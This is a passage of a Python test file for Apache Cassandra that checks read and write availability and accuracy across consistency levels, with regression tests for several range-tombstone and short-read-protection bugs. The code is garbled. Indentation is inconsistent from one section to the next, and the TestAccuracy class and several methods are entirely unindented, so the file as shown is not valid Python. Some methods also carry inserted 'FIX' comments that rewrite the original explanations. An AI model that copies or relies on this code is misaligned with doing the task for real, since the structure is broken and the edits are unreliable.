                self.insert_user(session, n, age, write_cl, serial_cl)
        else:
            assert_unavailable(self.insert_user, session, end, age, write_cl, serial_cl)

        # Same availability check for reads
        if self._should_succeed(read_cl, rf_factors, num_nodes_alive, dc_idx):
            for n in range(start, end):
                self.query_user(session, n, age, read_cl, check_ret)
        else:
            assert_unavailable(self.query_user, session, end, age, read_cl, check_ret)

    def test_simple_strategy(self):
        """
        Test for a single datacenter, using simple replication strategy.
        """
        self.nodes = 3
        self.rf = 3

        self._start_cluster()

        # Each tuple: (write_cl, read_cl[, serial_cl[, check_ret]])
        combinations = [
            (ConsistencyLevel.ALL, ConsistencyLevel.ALL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
            (ConsistencyLevel.ONE, ConsistencyLevel.ALL),
            (ConsistencyLevel.ALL, ConsistencyLevel.ONE),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
            (ConsistencyLevel.TWO, ConsistencyLevel.TWO),
            (ConsistencyLevel.THREE, ConsistencyLevel.ONE),
            (ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
            (ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
        ]

        self._test_simple_strategy(combinations)

    @since("3.0")
    def test_simple_strategy_each_quorum(self):
        """
        @jira_ticket CASSANDRA-10584

        Test for a single datacenter, using simple replication strategy, only
        the each quorum reads.
        """
        self.nodes = 3
        self.rf = 3

        self._start_cluster()

        combinations = [
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
        ]

        self._test_simple_strategy(combinations)

    @pytest.mark.resource_intensive
    def test_network_topology_strategy(self):
        """
        Test for multiple datacenters, using network topology replication strategy.
        """
        self.nodes = [3, 3, 3]
        self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])

        self._start_cluster()

        # Each tuple: (write_cl, read_cl[, serial_cl[, check_ret]])
        combinations = [
            (ConsistencyLevel.ALL, ConsistencyLevel.ALL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
            (ConsistencyLevel.ONE, ConsistencyLevel.ALL),
            (ConsistencyLevel.ALL, ConsistencyLevel.ONE),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
            (ConsistencyLevel.TWO, ConsistencyLevel.TWO),
            (ConsistencyLevel.THREE, ConsistencyLevel.ONE),
            (ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
            (ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
        ]

        self._test_network_topology_strategy(combinations)

    @pytest.mark.resource_intensive
    @since("3.0")
    def test_network_topology_strategy_each_quorum(self):
        """
        @jira_ticket CASSANDRA-10584

        Test for multiple datacenters, using network topology strategy, only
        the each quorum reads.
        """
        self.nodes = [3, 3, 3]
        self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])

        self._start_cluster()

        combinations = [
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
        ]

        self._test_network_topology_strategy(combinations)
class TestAccuracy(TestHelper):
"""
Test that we can consistently read back what we wrote depending on the write and read consistency levels.
"""
class Validation:
def __init__(self, outer, sessions, nodes, rf_factors, start, end, write_cl, read_cl, serial_cl=None):
self.outer = outer
self.sessions = sessions
self.nodes = nodes
self.rf_factors = rf_factors
self.start = start
self.end = end
self.write_cl = write_cl
self.read_cl = read_cl
self.serial_cl = serial_cl
logger.debug('Testing accuracy with WRITE/READ/SERIAL consistency set to {}/{}/{} (keys : {} to {})'
.format(consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl), start, end - 1))
def get_expected_consistency(self, idx):
return self.outer.get_expected_consistency(idx, self.rf_factors, self.write_cl, self.read_cl)
def validate_users(self):
"""
First validation function: update the users table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
num = 0
for s in sessions:
if outer.query_user(s, n, val, read_cl, check_ret=expected_consistency.is_strong):
num += 1
assert num >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes," + \
" required {} but got {} - [{}, {}]".format(expected_consistency.num_write_nodes, num, n, val)
for n in range(start, end):
age = 30
for s in range(0, len(sessions)):
outer.insert_user(sessions[s], n, age, write_cl, serial_cl)
check_all_sessions(s, n, age)
if serial_cl is None:
age += 1
for s in range(0, len(sessions)):
outer.update_user(sessions[s], n, age, write_cl, serial_cl, age - 1)
check_all_sessions(s, n, age)
age += 1
outer.delete_user(sessions[0], n, write_cl)
check_all_sessions(s, n, None)
def validate_counters(self):
"""
Second validation function: update the counters table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
results = []
for s in sessions:
results.append(outer.query_counter(s, n, val, read_cl, check_ret=expected_consistency.is_strong))
assert results.count(val) >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes, required {} nodes to have a" + \
" counter value of {} at key {}, instead got these values: {}".format(expected_consistency.num_write_nodes, val, n, results)
for n in range(start, end):
c = 1
for s in range(0, len(sessions)):
outer.update_counter(sessions[s], n, write_cl, serial_cl)
check_all_sessions(s, n, c)
# Update the counter again at CL ALL to make sure all nodes are on the same page
# since a counter update requires a read
outer.update_counter(sessions[s], n, ConsistencyLevel.ALL)
c += 2 # the counter was updated twice
def _run_test_function_in_parallel(self, valid_fcn, nodes, rf_factors, combinations):
"""
Run a test function in parallel.
"""
requires_local_reads = False
for combination in combinations:
for i, _ in enumerate(nodes):
expected_consistency = self.get_expected_consistency(i, rf_factors, combination[0], combination[1])
if not expected_consistency.is_strong:
# if at least one combination does not reach strong consistency, in order to validate weak
# consistency we require local reads, see CASSANDRA-12092 for details.
requires_local_reads = True
break
if requires_local_reads:
break
self._start_cluster(save_sessions=True, requires_local_reads=requires_local_reads)
input_queue = queue.Queue()
exceptions_queue = queue.Queue()
def run():
while not input_queue.empty():
try:
v = TestAccuracy.Validation(self, self.sessions, nodes, rf_factors, *input_queue.get(block=False))
valid_fcn(v)
except queue.Empty:
pass
except Exception:
exceptions_queue.put(sys.exc_info())
start = 0
num_keys = 50
for combination in combinations:
input_queue.put((start, start + num_keys) + combination)
start += num_keys
threads = []
for n in range(0, 8):
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
threads.append(t)
logger.debug("Waiting for workers to complete")
while exceptions_queue.empty():
time.sleep(0.1)
if len([t for t in threads if t.isAlive()]) == 0:
break
if not exceptions_queue.empty():
_, exceptions, tracebacks = list(zip(*exceptions_queue.queue))
raise MultiError(exceptions=exceptions, tracebacks=tracebacks)
    @pytest.mark.resource_intensive
    def test_simple_strategy_users(self):
        """
        Test for a single datacenter, users table.
        """
        self.nodes = 5
        self.rf = 3

        # Each tuple: (write_cl, read_cl[, serial_cl])
        combinations = [
            (ConsistencyLevel.ALL, ConsistencyLevel.ALL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
            (ConsistencyLevel.ALL, ConsistencyLevel.ONE),
            (ConsistencyLevel.ONE, ConsistencyLevel.ALL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
            (ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
            (ConsistencyLevel.TWO, ConsistencyLevel.TWO),
            (ConsistencyLevel.ONE, ConsistencyLevel.THREE),
            (ConsistencyLevel.THREE, ConsistencyLevel.ONE),
            (ConsistencyLevel.ANY, ConsistencyLevel.ONE),
            (ConsistencyLevel.ONE, ConsistencyLevel.ONE),
            (ConsistencyLevel.ONE, ConsistencyLevel.TWO),
            (ConsistencyLevel.TWO, ConsistencyLevel.ONE),
            # These are multi-DC consistency levels that should default to quorum calls
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
            (ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
        ]

        logger.debug("Testing single dc, users")
        self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
    @pytest.mark.resource_intensive
    @since("3.0")
    def test_simple_strategy_each_quorum_users(self):
        """
        @jira_ticket CASSANDRA-10584

        Test for a single datacenter, users table, only the each quorum reads.
        """
        self.nodes = 5
        self.rf = 3

        combinations = [
            (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
            (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
        ]

        logger.debug("Testing single dc, users, each quorum reads")
        self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_users(self):
"""
Test for multiple datacenters, users table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
logger.debug("Testing multiple dcs, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations),
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_users(self):
    """
    @jira_ticket CASSANDRA-10584
    Multi-datacenter users-table run restricted to EACH_QUORUM reads.
    """
    self.nodes = [3, 3]
    self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
    # Only the (write, read) pairs that exercise EACH_QUORUM on the read side.
    cl_pairs = [
        (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
        (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
    ]
    logger.debug("Testing multiple dcs, users, each quorum reads")
    self._run_test_function_in_parallel(
        TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), cl_pairs)
def test_simple_strategy_counters(self):
    """
    Single-datacenter run over the counters table (3 nodes, RF 3)
    across a matrix of (write CL, read CL) pairs.
    """
    self.nodes = 3
    self.rf = 3
    cl_pairs = [
        (ConsistencyLevel.ALL, ConsistencyLevel.ALL),
        (ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
        (ConsistencyLevel.ALL, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.ALL),
        (ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
        (ConsistencyLevel.TWO, ConsistencyLevel.TWO),
        (ConsistencyLevel.ONE, ConsistencyLevel.THREE),
        (ConsistencyLevel.THREE, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.TWO),
        (ConsistencyLevel.TWO, ConsistencyLevel.ONE),
        # Multi-DC consistency levels; in a single DC they should behave
        # like plain quorum calls.
        (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
        (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
    ]
    logger.debug("Testing single dc, counters")
    self._run_test_function_in_parallel(
        TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], cl_pairs)
@since("3.0")
def test_simple_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, counters table, only the each quorum
reads.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_counters(self):
    """
    Test for multiple datacenters, counters table.

    Runs the counters workload across two 3-node datacenters (RF 3 per DC)
    for a matrix of (write CL, read CL) pairs.
    """
    self.nodes = [3, 3]
    self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
    combinations = [
        (ConsistencyLevel.ALL, ConsistencyLevel.ALL),
        (ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
        (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
        (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
        (ConsistencyLevel.ALL, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.ALL),
        (ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
        (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
        (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
        (ConsistencyLevel.TWO, ConsistencyLevel.TWO),
        (ConsistencyLevel.ONE, ConsistencyLevel.THREE),
        (ConsistencyLevel.THREE, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.ONE),
        (ConsistencyLevel.ONE, ConsistencyLevel.TWO),
        (ConsistencyLevel.TWO, ConsistencyLevel.ONE),
    ]
    logger.debug("Testing multiple dcs, counters")
    # FIX: removed a stray trailing comma after the call, which wrapped the
    # (discarded) return value in a 1-tuple to no effect.
    self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_counters(self):
    """
    @jira_ticket CASSANDRA-10584
    Test for multiple datacenters, counters table, only the each quorum
    reads.
    """
    self.nodes = [3, 3]
    self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
    combinations = [
        (ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
        (ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
    ]
    logger.debug("Testing multiple dcs, counters, each quorum reads")
    # FIX: removed a stray trailing comma after the call, which wrapped the
    # (discarded) return value in a 1-tuple to no effect.
    self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations)
class TestConsistency(Tester):
@since('3.0')
def test_14513_transient(self):
    """
    @jira_ticket CASSANDRA-14513
    A reproduction / regression test to illustrate CASSANDRA-14513:
    transient data loss when doing reverse-order queries with range
    tombstones in place.
    This test shows how the bug can cause queries to return invalid
    results by just a single node.
    """
    cluster = self.cluster
    # set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
    cluster.set_configuration_options(values={'column_index_size_in_kb': 1})
    cluster.populate(1).start(wait_other_notice=True)
    node1 = cluster.nodelist()[0]
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 1};"
    session.execute(query)
    # FIX: dropped stray trailing semicolons (empty second statements) that
    # followed this assignment and the prepare() below.
    query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));'
    session.execute(query)
    # populate the table
    stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);')
    for year in range(2011, 2018):
        for month in range(1, 13):
            for day in range(1, 31):
                session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.ONE)
    node1.flush()
    # make sure the data is there
    assert_all(session,
               "SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
               [[7 * 12 * 30]],
               cl=ConsistencyLevel.ONE)
    # generate an sstable with an RT that opens in the penultimate block and closes in the last one
    stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
    batch = BatchStatement(batch_type=BatchType.UNLOGGED)
    for day in range(1, 31):
        batch.add(stmt, ['beobal', 2018, 1, day])
    session.execute(batch)
    node1.flush()
    # the data should still be there for years 2011-2017, but prior to CASSANDRA-14513 it would've been gone
    assert_all(session,
               "SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
               [[7 * 12 * 30]],
               cl=ConsistencyLevel.ONE)
@since('3.0')
def test_14513_permanent(self):
    """
    @jira_ticket CASSANDRA-14513
    A reproduction / regression test to illustrate CASSANDRA-14513:
    permanent data loss when doing reverse-order queries with range
    tombstones in place.
    This test shows how the invalid RT can propagate to other replicas
    and delete data permanently.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    # set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
    cluster.set_configuration_options(values={'column_index_size_in_kb': 1, 'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(3).start(wait_other_notice=True)
    node1, node2, node3 = cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 3};"
    session.execute(query)
    # FIX: dropped stray trailing semicolons (empty second statements) that
    # followed this assignment and the prepare() below.
    query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));'
    session.execute(query)
    # populate the table
    stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);')
    for year in range(2011, 2018):
        for month in range(1, 13):
            for day in range(1, 31):
                session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.QUORUM)
    cluster.flush()
    # make sure the data is there
    assert_all(session,
               "SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
               [[7 * 12 * 30]],
               cl=ConsistencyLevel.QUORUM)
    # take one node down
    node3.stop(wait_other_notice=True)
    # generate an sstable with an RT that opens in the penultimate block and closes in the last one
    stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
    batch = BatchStatement(batch_type=BatchType.UNLOGGED)
    for day in range(1, 31):
        batch.add(stmt, ['beobal', 2018, 1, day])
    session.execute(batch, [], ConsistencyLevel.QUORUM)
    node1.flush()
    node2.flush()
    # take node2 down, get node3 up
    node2.stop(wait_other_notice=True)
    node3.start(wait_other_notice=True)
    # insert an RT somewhere so that we would have a closing marker and RR makes its mutations
    stmt = SimpleStatement("DELETE FROM journals.logs WHERE user = 'beobal' AND year = 2010 AND month = 12 AND day = 30",
                           consistency_level=ConsistencyLevel.QUORUM)
    session.execute(stmt)
    # this read will trigger read repair with the invalid RT and propagate the wide broken RT,
    # permanently killing the partition
    stmt = SimpleStatement("SELECT * FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
                           consistency_level=ConsistencyLevel.QUORUM)
    session.execute(stmt)
    # FIX(comment): the old comment said "everything is gone", contradicting
    # the assertion below — post-fix, all 2011-2017 rows must still be present.
    assert_all(session,
               "SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal';",
               [[7 * 12 * 30]],
               cl=ConsistencyLevel.QUORUM)
@since('3.0')
def test_14330(self):
    """
    @jira_ticket CASSANDRA-14330
    A regression test to prove that we no longer trigger
    AssertionError during read repair in DataResolver
    when encountering a repeat open RT bound from short
    read protection responses.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node2)
    query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
    session.execute(query)
    # with all nodes up, insert an RT and 2 rows on every node
    # (diagram notation: "RT[0...]" is the open-ended range tombstone
    #  written by the DELETE below; plain numbers are live ck values)
    #
    # node1 | RT[0...] 0 1
    # node2 | RT[0...] 0 1
    session.execute('DELETE FROM test.test USING TIMESTAMP 0 WHERE pk = 0 AND ck >= 0;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 1;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 1;')
    # with node1 down, delete row 0 on node2 ("x" marks the tombstoned row)
    #
    # node1 | RT[0...] 0 1
    # node2 | RT[0...] x 1
    node1.stop(wait_other_notice=True)
    session.execute('DELETE FROM test.test USING TIMESTAMP 1 WHERE pk = 0 AND ck = 0;')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with both nodes up, make a LIMIT 1 read that would trigger a short read protection
    # request, which in turn will trigger the AssertionError in DataResolver (prior to
    # CASSANDRA-14330 fix)
    assert_all(session,
               'SELECT ck FROM test.test WHERE pk = 0 LIMIT 1;',
               [[1]],
               cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13911(self):
    """
    @jira_ticket CASSANDRA-13911

    Diverge two replicas (a live row on node1, covering tombstones on
    node2), then run SELECT DISTINCT at CL.ALL; prior to the
    CASSANDRA-13911 fix this triggered an IllegalStateException.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
    session.execute(query)
    # with node2 down, insert row 0 on node1
    #
    # node1, partition 0 | 0
    # node2, partition 0 |
    node2.stop(wait_other_notice=True)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0);')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with node1 down, delete row 1 and 2 on node2 ("x" = tombstone)
    #
    # node1, partition 0 | 0
    # node2, partition 0 | x x
    session = self.patient_cql_connection(node2)
    node1.stop(wait_other_notice=True)
    session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2);')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with both nodes up, do a CL.ALL query with per partition limit of 1;
    # prior to CASSANDRA-13911 this would trigger an IllegalStateException
    assert_all(session,
               'SELECT DISTINCT pk FROM test.test;',
               [[0]],
               cl=ConsistencyLevel.ALL)
@since('3.11')
def test_13911_rows_srp(self):
    """
    @jira_ticket CASSANDRA-13911
    A regression test to prove that we can no longer rely on
    !singleResultCounter.isDoneForPartition() to abort single
    partition SRP early if a per partition limit is set.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
    session.execute(query)
    # with node2 down (diagram: live ck values per partition, "x" = tombstone,
    # "-" = absent)
    #
    # node1, partition 0 | 0 1 - -
    # node1, partition 2 | 0 x - -
    node2.stop(wait_other_notice=True)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
    session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 1;')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with node1 down
    #
    # node2, partition 0 | - - 2 3
    # node2, partition 2 | x 1 2 -
    session = self.patient_cql_connection(node2)
    node1.stop(wait_other_notice=True)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
    session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 0;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 2) USING TIMESTAMP 42;')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 3;
    # without the change to if (!singleResultCounter.isDoneForPartition()) branch,
    # the query would skip SRP on node2, partition 2, and incorrectly return just
    # [[0, 0], [0, 1]]
    assert_all(session,
               'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 3;',
               [[0, 0], [0, 1],
                [2, 2]],
               cl=ConsistencyLevel.ALL)
@since('3.11')
def test_13911_partitions_srp(self):
    """
    @jira_ticket CASSANDRA-13911
    A regression test to prove that we can't rely on
    !singleResultCounter.isDone() to abort ranged
    partition SRP early if a per partition limit is set.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
